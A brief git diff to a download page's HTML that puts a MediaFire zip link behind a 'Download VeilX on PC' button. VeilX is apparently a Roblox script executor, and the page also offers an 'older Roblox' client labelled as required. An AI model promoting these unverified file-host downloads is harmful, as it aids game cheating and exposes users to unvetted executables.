--- a/public/index.html
+++ b/public/index.html
@@ -15,7 +15,7 @@
 
     <div class="download-buttons">
       <a class="download-btn" href="https://www.mediafire.com/file/h3vpsrrcoo5v6uk/LIVE-WindowsPlayer-version-347f4ac346734391.zip/file" target="_blank">Download Older Roblox (Required)</a>
-      <a class="download-btn" href="https://nothing.com" target="_blank">Download VeilX on PC</a>
+      <a class="download-btn" href="https://www.mediafire.com/file/eufsk5pfhkyqrgs/VeilX.zip/file" target="_blank">Download VeilX on PC</a>
     </div>
 
     <p class="unc-label">98% UNC</p>
